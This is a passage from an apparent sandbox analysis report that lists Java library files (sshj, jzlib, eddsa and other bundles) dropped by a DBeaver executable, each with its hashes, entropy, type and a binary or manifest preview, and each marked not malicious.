      Preview:PK..........A.................META-INF/..PK..........A...F`............META-INF/MANIFEST.MF}....0.E.@.!?...et...Z......&...B!.|.=...{HY.0'...^.8;..<..Z..ZT....C..]^....W4..P.......X..~).8kq..S..=?...hn.?.4N....0..z...3.PK..........A.l.j5...K.......module-info.class...N.0.F.[hK..BR..@...........&8.ve;E0...x......u...........k....:3=.3q%.&..un&.Vf..[.../8.q.[....D.X".S...!m.R.H.....f1...!t.u*.....?.L'.T.].@.....Ke.WJ;.V6..../.:....h37Z.u-D....2E>STf..'.+G.w..8w....p....|..pQ.&B.3...o".0.....[O..ja..&...WF4.v..~N..........ckY.6....;.)..lb.{........w...PK..........A.................com/..PK..........A.................com/github/..PK..........A.................com/github/weisj/..PK..........A.................com/github/weisj/jsvg/..PK..........A..+R........'...com/github/weisj/jsvg/SVGDocument.class.Xy|.....d7.]..3..(5j.`!R....dcd. .Qh+.l&..fg..M.....^......K.....Z....>mi.....|Z...L6.a7!.?v.7...}..{..s.<.`....D`E......@.'<........pgw[.....I;.....T((...[....-.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):1728
      Entropy (8bit):4.858853307624695
      Encrypted:false
      SSDEEP:
      MD5:C3A47FA0F2DB2070D0497B9D921FB8DC
      SHA1:B917497B88C15EA0AB080B5AB6FC4FD4871FC6ED
      SHA-256:9282A94A273DE041CA9EAFAFB836171A9CB8B7932597CD850CD50AC669F8986A
      SHA-512:02E7D6CF5EF736BD10F2B63CFD8FCEB80EC13973E1035C7F9FA99D81463A60B01E44EB3A716EE1DEEA963BA436FB6F1AAB5BF12931B40152ACDB2893AD6E3DC9
      Malicious:false
      Reputation:unknown
      Preview:Manifest-Version: 1.0..Created-By: Maven Archiver 3.6.1..Build-Jdk-Spec: 17..Bundle-ManifestVersion: 2..Bundle-Name: SSHv2 library for Java..Bundle-SymbolicName: org.jkiss.bundle.sshj;singleton:=true..Bundle-Version: 0.34.1..Bundle-ClassPath: lib/asn-one-0.6.0.jar,lib/eddsa-0.3.0.jar,lib/jzlib-1... 1.3.jar,lib/sshj-0.34.0.jar,...Bundle-RequiredExecutionEnvironment: JavaSE-1.7..Bundle-Vendor: Hierynomus..Eclipse-BundleShape: dir..Export-Package: net.schmizz.concurrent,net.schmizz.keepalive,net.schmizz.. .sshj,net.schmizz.sshj.common,net.schmizz.sshj.connection,net.schmizz.s.. shj.connection.channel,net.schmizz.sshj.connection.channel.direct,net.s.. chmizz.sshj.connection.channel.forwarded,net.schmizz.sshj.sftp,net.schm.. izz.sshj.signature,net.schmizz.sshj.transport,net.schmizz.sshj.transpor.. t.cipher,net.schmizz.sshj.transport.compression,net.schmizz.sshj.transp.. ort.digest,net.schmizz.sshj.transport.kex,net.schmizz.sshj.transport.ma.. c,net.schmizz.sshj.transport.random,net.schmizz.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):73
      Entropy (8bit):4.543292752052791
      Encrypted:false
      SSDEEP:
      MD5:EF62010E7AC707733F82B721A4D8B299
      SHA1:70F467BAADC46415C824B2072998271ED36F154B
      SHA-256:373332CC225862463EB29C529A48A3587F064DE56CDEC32DBB89D6526B6DC1EA
      SHA-512:EDA0B23004C9A48C3DAED92C95A15EDDA1D99E7F858B849094376E0867F0F170B87094CD33E0C4FBE714B4BEFB9290E2C76BF502F5A3044BA97F09F2DF5C175C
      Malicious:false
      Reputation:unknown
      Preview:artifactId=org.jkiss.bundle.sshj.groupId=org.jkiss.bundle.version=0.34.1.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:XML 1.0 document, ASCII text
      Category:dropped
      Size (bytes):2736
      Entropy (8bit):4.734693425697642
      Encrypted:false
      SSDEEP:
      MD5:532F9F23990FBB54C6430ABFDFC8A445
      SHA1:81CA0E89BFDFFE191D138CC21DEDA3476F6C6A8A
      SHA-256:AB9AE9E919ADE995564550DAB500EC7B24FFE5C8001F2E4F8E8AEB1553137E88
      SHA-512:1903A108D3EF00BF496FFA923E4BA5161BCD7FEAB78534A4A05CE1BA7B4949B11FF6EF2530883F33C1A4BBA506C3DB732A7A462329C9CDB62DF77C5DC90C582C
      Malicious:false
      Reputation:unknown
      Preview:<?xml version="1.0" encoding="UTF-8"?>.<project xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd" xmlns="http://maven.apache.org/POM/4.0.0". xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">. <modelVersion>4.0.0</modelVersion>. <groupId>org.jkiss.bundle</groupId>. <artifactId>org.jkiss.bundle.sshj</artifactId>. <version>0.34.1</version>. <properties>. <tycho-version>3.0.1</tycho-version>. <eclipse-p2-repo-url>https://download.eclipse.org/releases/2023-03</eclipse-p2-repo-url>. </properties>. <dependencies>. <dependency>. <groupId>org.bouncycastle</groupId>. <artifactId>bcpkix-jdk18on</artifactId>. <version>1.77</version>. <scope>compile</scope>. </dependency>. <dependency>. <groupId>org.bouncycastle</groupId>. <artifactId>bcprov-jdk18on</artifactId>. <version>1.77</version>. <scope>compile</scope>. </dependency>. <dependency>. <groupId>org.bouncycastle</gro
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with no line terminators
      Category:dropped
      Size (bytes):13
      Entropy (8bit):3.546593564294939
      Encrypted:false
      SSDEEP:
      MD5:57E2A9D1E10835BC3B59193EAB23CBBE
      SHA1:D50E9B57C60B7873485A6AAAA87C7DB13317FAC3
      SHA-256:BD76DE00AD21AAB8FCE0048A9630CF44FC0D9ED0CF0465FC7E78D3151C778587
      SHA-512:B20B0C010700CF3326E36887669EA5B11ADE7C32D3E7A637CED55C4F1885D733301F0859ABBBD1CC88F14BB75E1F8B2F7382E90A20AA503E405B7FD86A77F23F
      Malicious:false
      Reputation:unknown
      Preview:# bundle-sshj
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):3349
      Entropy (8bit):5.225640807884848
      Encrypted:false
      SSDEEP:
      MD5:643FEBFE8B6F61F705E490E72C138CB5
      SHA1:A59621FCA990548B2A8270F00F4508C6CE637184
      SHA-256:FBC224C3DF7C4C807EB4BADE8713BF2D5D69EA89E9769E5E0F3E9AC0A079D578
      SHA-512:5054D22891A92F9721550CED591B98B673968DE89B86C3F818BA4ECD0EAFD61A1F582A3AC9B9EB36DE8D9215CA45921368690574D3DEB2B519042EA95F95DE6A
      Malicious:false
      Reputation:unknown
      Preview:sshj - SSHv2 library for Java.Copyright 2010-2012 sshj contributors..This product includes code derived from software developed at .The Apache Software Foundation (http://www.apache.org/):..- Apache MINA SSHD.- Apache Commons-Net...// Apache Mina SSHD notice.. =========================================================================. == NOTICE file for use with the Apache License, Version 2.0, ==. == in this case for the SSHD distribution. ==. =========================================================================.. This product contains software developped by JCraft,Inc. and subject to. the following license:..Copyright (c) 2002,2003,2004,2005,2006,2007,2008 Atsuhiko Yamanaka, JCraft,Inc..All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are met:.. 1. Redistributions of source code must retain the above copyright notice,. th
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):67005
      Entropy (8bit):7.78044316068007
      Encrypted:false
      SSDEEP:
      MD5:5012B14A62F3369439EE0EB62C7D34F9
      SHA1:7F6141541E0A4D3AE0B02C901C2C1E9A772EB3D7
      SHA-256:E4F70FD92849B52240048B8EBACE0C9A17D3BB7B9C882B3C7778CEC3458495F5
      SHA-512:475E4B7D9CCDB347039E1CD06ABA7E4AE8C009E85781EEFCC5CA00F692084C7F1BBFF51F2D8F8BA6E00BC6D9DBA3D0CF6C22A9DF03C42E3F29722B69DE1D2101
      Malicious:false
      Reputation:unknown
      Preview:PK........@O;S................META-INF/..PK........@O;S.<Z<I...G.......META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r,-..M,.L...O).I..K.M.RH.....L-....--.K,...K......PK........@O;S................com/..PK........@O;S................com/hierynomus/..PK........@O;S................com/hierynomus/asn1/..PK........@O;S................com/hierynomus/asn1/types/..PK........@O;S............$...com/hierynomus/asn1/types/primitive/..PK........@O;S.'.........7...com/hierynomus/asn1/types/primitive/ASN1Integer$1.class..A..0.E...Z.{.......(t..<A.CMi...B....x(1.[.3.3.y.z?.....CL......".ds>..rT.Y......+m.*..n.."fHs].$.)].-.V..u.Y..YK'[.?.e.0."....d....+..~...;..'5Y.a......#....#....D.PK........@O;S....?.......<...com/hierynomus/asn1/types/primitive/ASN1Integer$Parser.class.Tkk.A.=.yl..6.....y.%..R.mE(.(..K?M.!..l..n...?S......G.wv......a..{.9svv~.....slZ..u....xd..c.&..(.(2...+.:.B.;.:}).;....=....;:.nO...9.f....P.b.!.K!.rC....;B...2....m..~..I./=...'....B.......).?...X...D...\_
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Java archive data (JAR)
      Category:dropped
      Size (bytes):63292
      Entropy (8bit):7.884424990998062
      Encrypted:false
      SSDEEP:
      MD5:EE7DE3B6F19DE76A06E465EFC978F669
      SHA1:1901C8D4D8BFFB7D79027686CFB91E704217C3E1
      SHA-256:4DDA1120DB856640DBEC04140ED23242215A075FE127BDEFA0DCFA29FB31267D
      SHA-512:637E75EF4B58B280AF057546AFC176DBF3BECF2B69F7DD31A716A90E01C01D7B1BCD400B29EFEEEA6B34DF9ADE7922C0665A000A3A2DB5A446DF293F8D1429CC
      Malicious:false
      Reputation:unknown
      Preview:PK........6..L................META-INF/MANIFEST.MF....}RMO.1........%R.. .d.....".j.^.cO.]..#"..z.t%.R.<..7.^s.;p....P...,O.e....]k....y.5Q.....{4^3...4.V.>p.#.w.2rTe.i.O/# `#.|..X.T\.}...cM.....J...E.Of.Z.@....N...fIP.{~.....P.:|..:..8r...V+..g&l..2..*{....k6p.?...(.V..I.~............9;."....<..4\<.Y..(...c....d.f........Bd..t.b...s..(M...;X.N.F.D..L....L.....,.#{..Y.......7|.Ml.D.=2....4.hp|6..-..7....V..&.(.S.&.:g..Y.......W...PK.....o........PK........6K.L................META-INF/..PK..............PK........6K.L................META-INF/maven/..PK..............PK........6K.L................META-INF/maven/net.i2p.crypto/..PK..............PK........6K.L............$...META-INF/maven/net.i2p.crypto/eddsa/..PK..............PK........6..L............2...META-INF/maven/net.i2p.crypto/eddsa/pom.properties.... .........5.s.K..pE....F.^....#....6H.2.7....q....:.U...wj...c?........>\.e.)N.....T..N...>...KR$.od......PK..[j..x.......PK...........L............+...META
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v1.0 to extract, compression method=store
      Category:dropped
      Size (bytes):71976
      Entropy (8bit):7.959377719461795
      Encrypted:false
      SSDEEP:
      MD5:386D3714FEF534D21175D8885AE48BF7
      SHA1:C01428EFA717624F7AABF4DF319939DDA9646B2D
      SHA-256:89B1360F407381BF61FDE411019D8CBD009EBB10CFF715F3669017A031027560
      SHA-512:339793DF0001214AAADAC2A5456C3CD54A0C09BA2C9E73CF13155ADBFDF1C2A953F7336903E45E76A52CE6B48C5B7C78436667D7836E7354E02E85BA0908AFD3
      Malicious:false
      Reputation:unknown
      Preview:PK.........DC................META-INF/PK.........DC...ne...{.......META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r,J..,K-B...V..+.$x...R.KRSt.*......3R.|..R.x..J3sJ..y..~..WJ6.p3=.xC3^.^..PK..........DC................com/PK..........DC................com/jcraft/PK..........DC................com/jcraft/jzlib/PK..........DC..M.........$...com/jcraft/jzlib/GZIPException.class}PMK.@.....h...EO....c..Q)..*=x..X7.YIS........?J|..A..0.>...~|...8B..-.-.m....Df......`......d._.a..0.I+P.H."....F. g.. RS?.rq_..K*C..vx}....TY..q.D<.?.......&}.G3m.gE.Gj.G.,......A.......<.].H......G.?B..H.1Z..3.s.[.^..........U.....k........Z...P...[:.,U....Q.7../PK..........DC[..m....d".. ...com/jcraft/jzlib/InfBlocks.class.8.x...?..6.....A..E.A...LH.h.j...5.d7........Z..jUZ.*...qy.P)W.b}km}..E...E.R.r..f......7...g.9...3.......1.2`2.V.Ip/........J..'...62..f.\.N.[T.j@.lc.A..1x..v.~.;t./x..G... ...x..'..d.$.?...\.4<..3..e...{.......K<..5x...$.tui.g~.....kL.......`.....7.zK.......'y......:..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):553097
      Entropy (8bit):7.896314654167531
      Encrypted:false
      SSDEEP:
      MD5:F48C2231D669F75E66CD2EB786F41FE9
      SHA1:637207D2BD1676D21BFCD14975050C8E9B229E87
      SHA-256:8F8E063A4949CBFBC5F5FB401595BD1B7142FB9CB6CDBFAE77EB6F94824E96E5
      SHA-512:A0598837C08DE34356AA66E93BCE9AC1F92F42A1C8854947DD62A6C99F7686B6E40054E67C71321016E5BBB6498C43173D7A902183E3BE7C91447D04C08F067B
      Malicious:false
      Reputation:unknown
      Preview:PK.........C.U................META-INF/..PK.........C.U.......y.......META-INF/MANIFEST.MF.Y.o.6.....`.0$...n.a.rh......2..M.6.I.H*....=.%...t.8...}.Q.4.k........r4'...S.F1....V....g......h.dF.....y<z.k..=.}I......2^.>.....t..l>.._.f........H............w@p..Ie..){....1....j..$.D...!R.<...g..{2.ON.......'2m......X..Y.<e{.....Z.%. .....N.....6...u..8...#-6)5..u.Ol4g.....*,.db.......G...@....q6...V..<..ESmuZ.p....H..\......'.rPpR.'X..w6.].=.d.......b$6..@.HN"`.%YB.Q2@.......H]|.'.>.Fxr../..5Es.%.+S.s.v..!.3%.Dd.'...il..,7......\..*".]...|..d.r.x..iM..RC.G.3..'.I9CJS...o..F(-pN...Hu.6k...9.H._P:s%..f..F.N...\.v.....-..q..... .... ..T.TE<jRcdb!^..gvO..l.v...$S\k.w..t.'(.>.....@.....{V;Y....7[i.xE.Q.....0/kH_."..7k..h}J..f:..z..2..`..M...? .f._..4.f:.3.<...Y.KC......5..`A5.n.K.ukh...Jg..._....h..sKY;.5L....,.rHW..i..T."...8Za.fbI..Lp.vz[....z..Z..+..r..]...Lgp.......l.p..].x...6'.^..#.m{.[.............. R....;.k.r...5.S...f.r.........%.'...6..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):40830
      Entropy (8bit):7.816937553861434
      Encrypted:false
      SSDEEP:
      MD5:29913F6ECE0FD95B60D616A5AAF6C6FF
      SHA1:AE0B184A031221E181BF305B369BDC338FA1DE91
      SHA-256:03ACC7CF81AB1274E6D430F2E8B8B0C119EE64F8472C296BB4ADAB6CC51A8312
      SHA-512:0E63F22EFB26ED0737DC6A21BE4CA97379C3A178F308D2F1F83EF7E9F4C3C0D11421F4B616E1D83EBB09C86EEB350DA7215474B5EACC7577C7509E2C7B37665B
      Malicious:false
      Reputation:unknown
      Preview:PK........@.cX................META-INF/MANIFEST.MF.W[s...~OU.......(WQ.+.(.E..b.)..Xr.."..Cb&s.VeO.....u.. Y..@.z...0M.:D.....0r{.....8.q.....uH..q...!...z......:.....i.,....'e.F.'.T~-L..6 q....M.Wu.i..:W.......@l..qf.c.;_4.g....@.c;..s^..~........Y.x^./...L.....=.K.....L...$..}..Q*..U...v.:%...:..-..Q..........OY...b9....@..4*....x_SO#.(...w.....%.A..<w...f.hs...2A-....Q..>.....U.J........)...|....g9..=[..........~.......@y...V~7...Q.......FLb..o.ao......%.O...\,S.`.L.]G....J.".O0.9...-Q...NOJ..U.W.....Y6. jE..~....k.!.......//.{.:Z......{b..._.7.7....z.K=.Yh..se.......=pP1...h.Em..no...#.L..~...:.E.'GP......ES..ODc....rJDL...mT"...'.J.&.S..3...#IOO.+..O....$9A...a...NT.0....#...^bE.[5..(....\...Y.f G....-E.?....q&].G.......(..;.q~....f|...W.cB.QV.......79.a..j..,...=|..4.\C..Pc~Lb@,.Zg....`.e..D.8....^.H.0...b.....*Q..(.DE...U.h..@.&O..x....E.]........d... b..v.=.{.....]...X..~.].ZQ.?Cia....h..c...{.{...6.:...Nw..}9..XW.g.CsQ.....P8.$..>N..S..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):31997
      Entropy (8bit):7.86184400952675
      Encrypted:false
      SSDEEP:
      MD5:5E1E9BF4219FF5A0B90787CEC151A531
      SHA1:1B855CA1D4CB7215BA339CFD27B1746005CF500D
      SHA-256:DCC3D4DEF3E46B8E6948283F992730AD502F592220EA8DA2B0B71F2F2D6623C4
      SHA-512:44DC1DEAEE1D41E26A80FD49D4127125E0E1A17CBF69EC2377EB819CD09F54490F924A268963C26559ED20539CE117056A8843B43A0ACDF586B2ADE3D02D01DA
      Malicious:false
      Reputation:unknown
      Preview:PK..........cX................META-INF/MANIFEST.MF..]s.H....?XSS[I....:.......@.f...ZA..!..1..N..NrI...s...)8..$.h@LPxl.*.r>.I...G........5...U..B.,..T.f.b'k.........9.C@...z'9:>,N.'...n!........eWA.qt.....[he{0.,#.......".>.WY`.>._w..-........D%r....C.P.(N.?h...R.T.....d-........6..-.)J.eu./8l$>8g.\.......>..]B..>)..^Yoee..2..k.J........|-.m.E...l7N..........)".B~>W@4k=a./x..c."Bq...N>.TJ(..y.\;.a..b.......H..m. .........s"..o..<\.F ....C.*.SEz|....s..E~.c....WJ.(....r.5[...,.:N..7'Ok.`.w.X...v...2E.....>.....ED.*"....5.j.M..R...f...._i.H.m..PT.#A_...*....A3l.l...{....N.f...h..Y.G.@.....@.hcY.i...b.>A......n@~.f._|2.a.1..0.pK....6r..r.3.Is.5vM...2.h..`.]......^M.4.>3.6.wy..d|....)........Qc...T..]{[.n..?..W.......2y..IAd....nG.q..sy..%.J.H.q.=.R.{.9.Z.....q..k.jp.k.........b(..6.C....0...:...%.$:..M'>....O.i.eK........Y.dA.....Q..}.o..gn|...A.4...E=0V.no......w@o;.?)....=.&^*z.UJ.........'@.N......CR%..x../.............u....H...k....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):816728
      Entropy (8bit):7.937015962418088
      Encrypted:false
      SSDEEP:
      MD5:A126F60C8B86D8B5B7CB4732CD944BA1
      SHA1:3074242655BEAA2A6ADF3E8C2A6FCD85C8AD9546
      SHA-256:9394F1592B6332A23F9C3235440A75437E362F99B123C61A4E9C2EC09EBEA4B9
      SHA-512:61FEE6DE61847A9F87A071AA4B1A424B5E2490A4D7365AD8B3BB36869EB9C19C059CAAEBFF774C7ABC856A08003956E30116A78F690F8DD72BBC6A6716B90112
      Malicious:false
      Reputation:unknown
      Preview:PK........A.cX................META-INF/MANIFEST.MF....H.....y..A..l.t.9.....HQ.%...l.{...W..r.));..E......+.....S&a....A.%U...._........}.g......$..;&E...!..A(..$.vu.;..._..8c.~I....m....?.g....oo..b..)#(........].b...vRun.|=.........:O<..>.vy....R.....mU.}I...|..^......R......J.......g.\..y.t.....~......'.......y..o....+......;.....j..5....?......].A.t}..sS_Uy..n.4....;.J....dH.8.......W.U.....G..N.t..z..............2x...K....!w~>s}....#..S.;..m..mPz.{.|}...6x..;C........i.w..>..k.f..3...;.....~.vL...c^N.^u}./........#...u........'..L.....[.../k+u.........rv.E..h.....cP.rb..I...K....*....R..\..A.t}P.s.O3..`.Ne..8.+..t..~..FyY.WJ..M..C.........?\.%...O.......j{=...-.....6s.L..=....6c/D....~:.M?.l.:..W\..r..?...:`.%y;.{.m~o'.O.........G.^...?..z...G......n.\...].m.......wL..M.+...?m..H..W.W......+.Ozv.W...^...w.....Y{.......?.....?..]]s}.........<.|..I?.6.I...o.K.<'O./........wI....J.}...X.}U\..~.V...2y_.~.m.S;o...h...{.Q}...?
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):228719
      Entropy (8bit):7.949867325507001
      Encrypted:false
      SSDEEP:
      MD5:DBB8828DBEA1EACEB05C633A56570003
      SHA1:337F6AA5E843E5DF77F20D220BBDCFCA4E2D7AD4
      SHA-256:AB49132F981BF589428F183AE0FBA9AE6FCA4EC5DBE59271C9B506EAFA59DB1B
      SHA-512:F73E2C81A53261F853DB6446086A16325AC459D9D68488656F6474514C3E7B18DF05DD65CDE2B80CA9FFC2CBE4E7DD6F8BAE20FCD44E77242533DD31BDAF6190
      Malicious:false
      Reputation:unknown
      Preview:PK........8.cX................META-INF/MANIFEST.MF.Z..H../..4j.......G-.c.f...cnF,.n.....Y[W.3.Sw8......v...n>....<.....|.@.Q.}......H~].+....Y...`(..y..L..~..`w.z...6......N........../.m. ....O[..O..*.m*.#._..vc....'....i.:y...o.U..'Q]?|e..y.....@..u..)hf..j.....w.<....g...RA...|.........m..n.s....H.i.y.Q._.l.'&...Uf......0..}....6.....O.n..5xp..<Tm......................~....h......?....5.@.....a...zS..[.I?..O.s...vx..G....H....'.=.... ..u.=....!.....I..P.v......7.]......4.c.".....M..E.|6......{....k.9..........(....:.u...c.T.......?...%.}b......B......?|..L.H. ...k...i... ...Q0...X....y..=...z....'.....d.0..._....Y..I....p..3.pag ...v..~.5k..fv..G..J}..m3x.i..H....qqh.....u\..^.....g5|...[..E..z.....].`..p..:.A..H..........N....R.....y..[.)..T...8.xDC{...)...X./.~A...v"~.e....T..g...5.-.vyX..6..sN.....S..y..n.:..a..L........k.i.f`......D.R[..P..UJ27Z.8@.%(....R.+@...{H..G.Wx...b..6](L....p'....[I...D.......O...WX8E..~......h.....TM.^ .BOA
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):46994
      Entropy (8bit):7.890864916541591
      Encrypted:false
      SSDEEP:
      MD5:876CFD1DB4196E4F71EF88578206DDB0
      SHA1:F3CE865C3DE9427C168E933EB27A76225899D638
      SHA-256:E52911946FF6E30BD705D90EDABF56C46DC351B6CDCCA38368A05D5D413AE59A
      SHA-512:B29936C0AF72CEFE91EF2713A3D5D2569622370A3C1DA84EC530A07E762A2F492AE3A7FBB05D089D785A92C267C739C0094F35CDFDB300BD06C0C49350BB0FD0
      Malicious:false
      Reputation:unknown
      Preview:PK..........cX................META-INF/MANIFEST.MF.V]s...}OU..55u.b....< .../...)>:.|.4*..A.8..D.....{.....;)|..nZ..0K..t....0....5..x.".....xh..6K1.C..k4n......g.P.f.w.....o.2.c.._./....R?C..~.|.!e(.l.....-uh4.2.3./.F..Y.......0.E.z#.;.i...U.4.....1*.;...h.....r.Qs.....~].E...-z...\..."......m..h..}./.|......0..zxD..N%.......>....w...b....e..P..o..LuB....GY.uI.S.S.o....;...:^..7.nm..yT..Q.5.S.u...X.,...z.._O.....;...Y......ks.......x]{..c.?..^:.H.?..q.w.w.".P.+.y."k(..R.Y.0.D..tK...I...%53......1..m....6.C.k.#...hz.P..H.o.'..27..l.....F.j..-B...{oT.T2.v_.2....r........Q....3.Q....J..7N_..<..mi?m/.........Hr...udZC.g..p.'T..,D..KekT..apN.F..v..".q...uH..3.."..q...`.c..T..,Aw.=g1.'.~..E.x.qb...p..1M.........e9@.....6.....y.&...1.........H...fX.A.E..6...s..l....}$..Q...........%n...P.2..n<..T....M....O.v..........n....'.%g.D..s....A.m4.#...l............Q_.|l.j..@.hI..M.O...h....E.!.....&....1X.2.h..F..X.h...|o.0TH......}k.I).+..-w..`g...8...
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):376932
      Entropy (8bit):7.912785138491829
      Encrypted:false
      SSDEEP:
      MD5:F0B90D20953C4B06225CC41B42C86CE7
      SHA1:0287A53BACDD1C931E04CA5D9D7E44BA12DB2F4C
      SHA-256:70B9FBBA3090F9D5881FDEBF1A88BA075D07B28561AEDE81A4B7D2EB7329ED74
      SHA-512:33610962D1CFAC63EF8F649C481E8C44DB337D721BAAA3C820DFB3771C75DB79D2A3EE26A42C33FA9E5D48B61C068047248ADBC4A8BBF833A65FFAB8C55CAA5F
      Malicious:false
      Reputation:unknown
      Preview:PK........1.cX................META-INF/MANIFEST.MF.|Y....{...h.k.l.1]...c..&.....^..../...Rm..;....O..!8.{......-.0..?.A.%U..o.;.._.!..?$?....~..t.J....... .Ba..8..........1h.%..0m.......P.y....._.|.u.J.j.......7.j..7U...u{.7.u........[q....0.j.wi.t.O.........nH..K.(..;...v....o...a......C..n..q..o.`.oS^..n....B.*....)..-...k.......o.....w`..+....../.\Wm...z..=...x..<5...5PO....)Y.....?.o......o~...4C...|...../O....j.w.P.w[../otS.?..x.M....6.....~.................Oz..].._.....w......rX.....I__..`...j.kPz..w.........Q.A..c.%.$O....A....1.....w]............\.6._...I_YG.I.>.......}..m..I..t..2......ar..t.....lj..>..?...>;..=.m.qk....Vu......wW....._......$wtM._.=~p)....._..../._...%....y.~z'8$`}....w(.....0w.......#........;...b.......M.?....Tm..<........c.X)G.4%....'.N..o.u>DI.n...>.!......].#..N..J..O7..e..E.b.1....0.....6.{.4d.._....S.$..}.?......i$.oY.n..}2`.J..nZ+.ag...s.%s....x..dM...o..-..+.9.z....[.m.,.Ln......m.{.1.......2mm.(-.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):411722
      Entropy (8bit):7.940285077570575
      Encrypted:false
      SSDEEP:
      MD5:4163B161AE3114C0813CF0AD8F6EEAFD
      SHA1:3BEC191A11A6980D8AF036C1DCDE38357F025469
      SHA-256:C4A2964FA4974D25134317F00314E256456D4F67C0565C8153B9218037540CCB
      SHA-512:6FCC247D69D03D8E226050C7A8AF48EB162B8EB4050158D988F47B9BAF183C8249D032333A4DCC638ABEC775C90818D006558E4DF8AE26829F1990DA8D7CB8CA
      Malicious:false
      Reputation:unknown
      Preview:PK........%.cX................META-INF/MANIFEST.MF.|Y....{I..J..U...1..u.k3....../G.`..../....!.HG.}....Y{...6.....O~..E.._.'..?6].z.w^.Q-}w..z.v.3....b.!......n?n.........S\...Y.v.{?\.t......o.....N~.....Q...."..........e.._.......N.S...|oQ...I.4.^...>.....&...og......./.}.>.0...]?...o7..........m..n......(...!.....N?Q./.}..L.....}......n?.l7..Ww....J...........<Qye.3....J?l..e.p..)..`^.....M[Oo...ul..J..6.....Z..o^..[?.O....}~ .>?0....d..........$....U....g.yV..M..?.E......-..~.a.N=.aV..........M...^.......J...|...U'S.i.v......-.Y..b.u_<..V...H...8...d.&.?.........._..........V...w.l...W........<..L.0.?..K*...@..T......IY...>Y.T..+....5w...W...|.=b.m...Yq.........'q./[.....O..89r.L..........g....,.+.~./0.c\.5...H..#w...........*.m..|.}/..^.1....q.@..=.y...h....o..xb.$.hU..L^.#.......$.EP.S.#.....i/....H..[.e.d...W.Sy..`.:.....X.t.R6...N..\6kj:m.....YT`P.........2..|A..H%c.!..9...v...8lV....HHV2.;..Q.;.L.~-...^.... IYN.@...2.nk,8
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):27772
      Entropy (8bit):7.91396018969257
      Encrypted:false
      SSDEEP:
      MD5:53B6080203EFD35760E817C96F5A1D0B
      SHA1:D44558EAD398C58D3E38132D8958F674C3C9CCEE
      SHA-256:17210DD22CA6170F9D7BB8E0F061004C840D8407551E5AC6FDD4ED04BF58E9A0
      SHA-512:DD6F49A67E31F564442200C22FDD3EC99735CF22E4BE5CB66246F0689F8943C2B19D08AE2B9654CD0E4762BA61FF14B8785CA4F098CC2118677F1C45D697296C
      Malicious:false
      Reputation:unknown
      Preview:PK........ .cX................META-INF/MANIFEST.MF..]s.J....?P[.N%.....[^(....G..w#.02083....h.9It7.N.....,.!.2.. e.Du....V..#..@......1..BX...V....b.....VV....).."..A!....o%...l..O`.$.`..Z...). 4>.../.(.!...........N..,\..}=B.....r.......C..!.E48M...x.R.(.]....C....fO.)...Qz(k./E.....w{.>.=.?..s..&..C`..........!.~]R.1.$.B.U|=.m.b...P..$.b._..HBm..R>'........N..6.C...`...$~V. ..t.A..~..1.).....A.0aYB...'.@.leu.x.[^.\t..P.ch..E^B.M...Yz.LbGLW..r..!q ........=...9.B.1N.4.NB.G.l.'9..?..8gC.h.0.b...../W<XH..W.^...=...y}..n}.X......s'.z .o$U.T.....P.D...!...........&wMY.+r.y..%....../..U./......../.w..K..T..,...wz...E..._o..H7W.N.f..Yw>".$.X/D.xf.{...F................CJ....P.4..{).k........9.$E.h..P.7..w..w~.I....v.."P;...E..&V.....W.;.8.x.e^..%v.G%3.=d......h.}.[.(..Dz.OL.u.o.}.l_\.k....t....f..T...O..I..#......u.w.sB.&....3..F.y....u...>.T...M.A...}}....o.......^B...mF#..NUw8........{..d=...Z.Z.....v,...].zmu....Q..\....O..pM....X<.Wj`..mF...
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):52860
      Entropy (8bit):7.932324260944344
      Encrypted:false
      SSDEEP:
      MD5:03B0BF72BBADFF190A4FC42509A353FA
      SHA1:0E9591AB1B14BE39FDF9332AE27BC42A9BEEB92B
      SHA-256:BC80718F4485C039A379DCD6F39AAFCB4AE00FABF084C7A4B85438172C1CE0B7
